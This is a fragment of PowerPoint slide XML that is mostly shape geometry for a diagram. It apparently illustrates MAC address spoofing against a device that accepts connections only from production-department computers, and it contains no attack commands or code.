                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 811"/>
                  <a:gd name="T9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1" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="811" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="451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9" name="Freeform 385">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F5E27E-1364-43A1-86DC-B1F553592D9A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973" y="1845"/>
                <a:ext cx="1037" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 811 w 1037"/>
                  <a:gd name="T1" fmla="*/ 278 h 278"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 217 h 278"/>
                  <a:gd name="T4" fmla="*/ 227 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 278"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 61 h 278"/>
                  <a:gd name="T8" fmla="*/ 811 w 1037"/>
                  <a:gd name="T9" fmla="*/ 27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7" h="278">
                    <a:moveTo>
                      <a:pt x="811" y="278"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="278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0" name="Freeform 386">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AE7ADC0-0F0E-402B-A3CF-1C13763FC495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200" y="1611"/>
                <a:ext cx="810" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 810"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 810 w 810"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 810 w 810"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 810"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 810"/>
                  <a:gd name="T9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0" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="810" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="451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1" name="Freeform 387">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75633CCF-AFDD-4255-BBC5-91382F738F0B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200" y="1549"/>
                <a:ext cx="1037" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 810 w 1037"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 218 h 279"/>
                  <a:gd name="T4" fmla="*/ 225 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 62 h 279"/>
                  <a:gd name="T8" fmla="*/ 810 w 1037"/>
                  <a:gd name="T9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7" h="279">
                    <a:moveTo>
                      <a:pt x="810" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="279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2" name="Freeform 388">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1AFCD9A-220E-4BAB-9372-EB2C4067D2DF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425" y="1315"/>
                <a:ext cx="812" cy="452"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 812"/>
                  <a:gd name="T1" fmla="*/ 0 h 452"/>
                  <a:gd name="T2" fmla="*/ 812 w 812"/>
                  <a:gd name="T3" fmla="*/ 218 h 452"/>
                  <a:gd name="T4" fmla="*/ 812 w 812"/>
                  <a:gd name="T5" fmla="*/ 452 h 452"/>
                  <a:gd name="T6" fmla="*/ 0 w 812"/>
                  <a:gd name="T7" fmla="*/ 234 h 452"/>
                  <a:gd name="T8" fmla="*/ 0 w 812"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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2" h="452">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="812" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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3" name="Freeform 389">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE55C199-5650-4107-89A9-F8FE451594AC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2425" y="1254"/>
                <a:ext cx="1039" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 812 w 1039"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1039 w 1039"/>
                  <a:gd name="T3" fmla="*/ 220 h 279"/>
                  <a:gd name="T4" fmla="*/ 226 w 1039"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1039"/>
                  <a:gd name="T7" fmla="*/ 61 h 279"/>
                  <a:gd name="T8" fmla="*/ 812 w 1039"/>
                  <a:gd name="T9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9" h="279">
                    <a:moveTo>
                      <a:pt x="812" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1039" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="279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4" name="Freeform 390">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{341723CC-BE9C-4BF2-B997-39FDBCB9721C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673" y="829"/>
                <a:ext cx="1784" cy="2414"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 743 w 755"/>
                  <a:gd name="T1" fmla="*/ 47 h 1022"/>
                  <a:gd name="T2" fmla="*/ 743 w 755"/>
                  <a:gd name="T3" fmla="*/ 47 h 1022"/>
                  <a:gd name="T4" fmla="*/ 743 w 755"/>
                  <a:gd name="T5" fmla="*/ 20 h 1022"/>
                  <a:gd name="T6" fmla="*/ 710 w 755"/>
                  <a:gd name="T7" fmla="*/ 11 h 1022"/>
                  <a:gd name="T8" fmla="*/ 704 w 755"/>
                  <a:gd name="T9" fmla="*/ 10 h 1022"/>
                  <a:gd name="T10" fmla="*/ 501 w 755"/>
                  <a:gd name="T11" fmla="*/ 149 h 1022"/>
                  <a:gd name="T12" fmla="*/ 501 w 755"/>
                  <a:gd name="T13" fmla="*/ 149 h 1022"/>
                  <a:gd name="T14" fmla="*/ 178 w 755"/>
                  <a:gd name="T15" fmla="*/ 571 h 1022"/>
                  <a:gd name="T16" fmla="*/ 168 w 755"/>
                  <a:gd name="T17" fmla="*/ 585 h 1022"/>
                  <a:gd name="T18" fmla="*/ 90 w 755"/>
                  <a:gd name="T19" fmla="*/ 700 h 1022"/>
                  <a:gd name="T20" fmla="*/ 63 w 755"/>
                  <a:gd name="T21" fmla="*/ 986 h 1022"/>
                  <a:gd name="T22" fmla="*/ 63 w 755"/>
                  <a:gd name="T23" fmla="*/ 986 h 1022"/>
                  <a:gd name="T24" fmla="*/ 104 w 755"/>
                  <a:gd name="T25" fmla="*/ 997 h 1022"/>
                  <a:gd name="T26" fmla="*/ 144 w 755"/>
                  <a:gd name="T27" fmla="*/ 966 h 1022"/>
                  <a:gd name="T28" fmla="*/ 144 w 755"/>
                  <a:gd name="T29" fmla="*/ 1011 h 1022"/>
                  <a:gd name="T30" fmla="*/ 183 w 755"/>
                  <a:gd name="T31" fmla="*/ 1022 h 1022"/>
                  <a:gd name="T32" fmla="*/ 718 w 755"/>
                  <a:gd name="T33" fmla="*/ 262 h 1022"/>
                  <a:gd name="T34" fmla="*/ 718 w 755"/>
                  <a:gd name="T35" fmla="*/ 218 h 1022"/>
                  <a:gd name="T36" fmla="*/ 743 w 755"/>
                  <a:gd name="T37" fmla="*/ 47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55" h="1022">
                    <a:moveTo>
                      <a:pt x="743" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="47"/>
                      <a:pt x="743" y="47"/>
                      <a:pt x="743" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="11"/>
                      <a:pt x="706" y="10"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="653" y="0"/>
                      <a:pt x="572" y="58"/>
                      <a:pt x="501" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="501" y="149"/>
                      <a:pt x="501" y="149"/>
                      <a:pt x="501" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="575"/>
                      <a:pt x="171" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="619"/>
                      <a:pt x="113" y="658"/>
                      <a:pt x="90" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="842"/>
                      <a:pt x="0" y="969"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="718" y="262"/>
                      <a:pt x="718" y="262"/>
                      <a:pt x="718" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="718" y="218"/>
                      <a:pt x="718" y="218"/>
                      <a:pt x="718" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="747" y="146"/>
                      <a:pt x="755" y="84"/>
                      <a:pt x="743" y="47"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="545554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5" name="Freeform 391">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53267C70-EAF4-4BB2-B0A7-48864C0E5814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762" y="3000"/>
                <a:ext cx="1344" cy="364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 439 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 364"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 123 h 364"/>
                  <a:gd name="T4" fmla="*/ 895 w 1344"/>
                  <a:gd name="T5" fmla="*/ 364 h 364"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 243 h 364"/>
                  <a:gd name="T8" fmla="*/ 439 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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364">
                    <a:moveTo>
                      <a:pt x="439" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="895" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="D1D1D1"/>
              </a:solidFill>
              <a:ln w="6350" cap="flat" cmpd="sng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6" name="Freeform 392">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF66C4E-B814-4A6D-976A-B6852E343127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>
                <a:off x="1763" y="855"/>
                <a:ext cx="1796" cy="2388"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 720 w 760"/>
                  <a:gd name="T1" fmla="*/ 15 h 1011"/>
                  <a:gd name="T2" fmla="*/ 705 w 760"/>
                  <a:gd name="T3" fmla="*/ 9 h 1011"/>
                  <a:gd name="T4" fmla="*/ 503 w 760"/>
                  <a:gd name="T5" fmla="*/ 149 h 1011"/>
                  <a:gd name="T6" fmla="*/ 503 w 760"/>
                  <a:gd name="T7" fmla="*/ 149 h 1011"/>
                  <a:gd name="T8" fmla="*/ 179 w 760"/>
                  <a:gd name="T9" fmla="*/ 570 h 1011"/>
                  <a:gd name="T10" fmla="*/ 169 w 760"/>
                  <a:gd name="T11" fmla="*/ 585 h 1011"/>
                  <a:gd name="T12" fmla="*/ 91 w 760"/>
                  <a:gd name="T13" fmla="*/ 699 h 1011"/>
                  <a:gd name="T14" fmla="*/ 68 w 760"/>
                  <a:gd name="T15" fmla="*/ 986 h 1011"/>
                  <a:gd name="T16" fmla="*/ 145 w 760"/>
                  <a:gd name="T17" fmla="*/ 966 h 1011"/>
                  <a:gd name="T18" fmla="*/ 145 w 760"/>
                  <a:gd name="T19" fmla="*/ 1011 h 1011"/>
                  <a:gd name="T20" fmla="*/ 720 w 760"/>
                  <a:gd name="T21" fmla="*/ 262 h 1011"/>
                  <a:gd name="T22" fmla="*/ 720 w 760"/>
                  <a:gd name="T23" fmla="*/ 217 h 1011"/>
                  <a:gd name="T24" fmla="*/ 720 w 760"/>
                  <a:gd name="T25" fmla="*/ 15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60" h="1011">
                    <a:moveTo>
                      <a:pt x="720" y="15"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="715" y="12"/>
                      <a:pt x="711" y="10"/>
                      <a:pt x="705" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="654" y="0"/>
                      <a:pt x="574" y="58"/>
                      <a:pt x="503" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="503" y="149"/>
                      <a:pt x="503" y="149"/>
                      <a:pt x="503" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="570"/>
                      <a:pt x="179" y="570"/>
                      <a:pt x="179" y="570"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="575"/>
                      <a:pt x="172" y="580"/>
                      <a:pt x="169" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="618"/>
                      <a:pt x="115" y="657"/>
                      <a:pt x="91" y="699"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="845"/>
                      <a:pt x="0" y="973"/>
                      <a:pt x="68" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="991"/>
                      <a:pt x="116" y="983"/>
                      <a:pt x="145" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="1011"/>
                      <a:pt x="145" y="1011"/>
                      <a:pt x="145" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="262"/>
                      <a:pt x="720" y="262"/>
                      <a:pt x="720" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="217"/>
                      <a:pt x="720" y="217"/>
                      <a:pt x="720" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="759" y="118"/>
                      <a:pt x="760" y="38"/>
                      <a:pt x="720" y="15"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A0A0A0"/>
              </a:solidFill>
              <a:ln w="6350" cap="flat" cmpd="sng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pic>
          <p:nvPicPr>
            <p:cNvPr id="671" name="Picture 2" descr="X:\Web2.0 PNG Icons\Speech Bubbles\GreenBubble.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{787184B6-EF70-486D-B2A0-2094DB32D8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18474" y="2755617"/>
              <a:ext cx="1489374" cy="122849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2" name="Rectangle 671">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{115F8B45-5DEB-4689-968A-25168CA31924}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8085951" y="2846986"/>
              <a:ext cx="1378269" cy="76944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Only computers from the production department can connect to me</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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941FA586-EEB3-4CE8-93F2-227A962A2898}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2587476" y="6117949"/>
              <a:ext cx="2332946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Hacker spoofing the MAC address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="674" name="Picture 3" descr="E:\haja Premium\Check_Mark.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42CFCAD6-D970-44E1-B8A4-BAA28937A9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52921" y="4266545"/>
              <a:ext cx="360270" cy="36027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75" name="Picture 3" descr="E:\haja Premium\Check_Mark.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D93FB675-D4FF-4846-AD50-01DCEC0045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53962" y="2397227"/>
              <a:ext cx="360270" cy="36027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76" name="Elbow Connector 535">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE73E4CB-96C1-496B-A5BC-B395BEAFD986}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4867994" y="2990603"/>
              <a:ext cx="6142619" cy="3291840"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="0070C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7" name="Oval 676">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ED20826-157A-42CC-88F3-C0B51101DB94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8153666" y="3661681"/>
              <a:ext cx="899422" cy="776692"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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678" name="Straight Arrow Connector 677">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CBF337C-8D6D-4C8C-ADB2-5CEBA6E83826}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="9792377" y="2373615"/>
              <a:ext cx="0" cy="640080"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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Straight Connector 678">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F600823-220B-476B-A30A-863FF0492B94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9785009" y="2997286"/>
              <a:ext cx="1245321" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="0070C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0" name="Freeform 824">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6EC7F2-D094-4CD4-92CA-4EBAB3CF054F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6214456" y="2304846"/>
              <a:ext cx="577850" cy="153987"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5150 w 5150"/>
                <a:gd name="T1" fmla="*/ 1380 h 1380"/>
                <a:gd name="T2" fmla="*/ 0 w 5150"/>
                <a:gd name="T3" fmla="*/ 0 h 1380"/>
                <a:gd name="T4" fmla="*/ 5150 w 5150"/>
                <a:gd name="T5" fmla="*/ 1380 h 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50" h="1380">
                  <a:moveTo>
                    <a:pt x="5150" y="1380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5150" y="138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81" name="Freeform 826">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF25C85B-D195-410C-90B9-59522CBEAE76}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6489094" y="2230233"/>
              <a:ext cx="577850" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5150 w 5150"/>
                <a:gd name="T1" fmla="*/ 1380 h 1380"/>
                <a:gd name="T2" fmla="*/ 0 w 5150"/>
                <a:gd name="T3" fmla="*/ 0 h 1380"/>
                <a:gd name="T4" fmla="*/ 5150 w 5150"/>
                <a:gd name="T5" fmla="*/ 1380 h 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50" h="1380">
                  <a:moveTo>
                    <a:pt x="5150" y="1380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5150" y="138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82" name="Freeform 827">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D11F6408-C5F4-4035-A021-9E794AEB7E38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5941406" y="2377871"/>
              <a:ext cx="576263" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5147 w 5147"/>
                <a:gd name="T1" fmla="*/ 1380 h 1380"/>
                <a:gd name="T2" fmla="*/ 0 w 5147"/>
                <a:gd name="T3" fmla="*/ 0 h 1380"/>
                <a:gd name="T4" fmla="*/ 5147 w 5147"/>
                <a:gd name="T5" fmla="*/ 1380 h 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47" h="1380">
                  <a:moveTo>
                    <a:pt x="5147" y="1380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5147" y="138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683" name="Group 828">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7756F27C-5591-4687-8C5B-59C4A76724E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137527" y="2458089"/>
              <a:ext cx="481013" cy="388938"/>
              <a:chOff x="2154" y="1819"/>
              <a:chExt cx="217" cy="176"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="712" name="Group 829">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EF77ED2-50D1-415D-9ED4-4A3E43AAE0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54" y="1862"/>
                <a:ext cx="217" cy="133"/>
                <a:chOff x="1977" y="2705"/>
                <a:chExt cx="897" cy="548"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="728" name="Freeform 830">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{207138DB-FDF2-48BE-B7A1-61D16DBF2A5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977" y="2787"/>
                  <a:ext cx="45" cy="321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3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3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9" name="Freeform 831">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94B8FB0F-2885-48DF-AE07-06869D15F07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022" y="2787"/>
                  <a:ext cx="46" cy="321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3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3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30" name="Freeform 832">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE1DEC4-8C53-44F5-8DAA-88BC766D282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74" y="2932"/>
                  <a:ext cx="45" cy="321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3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31" name="Freeform 833">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F9460C-E07E-4362-BE33-B8458D3B532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29" y="2932"/>
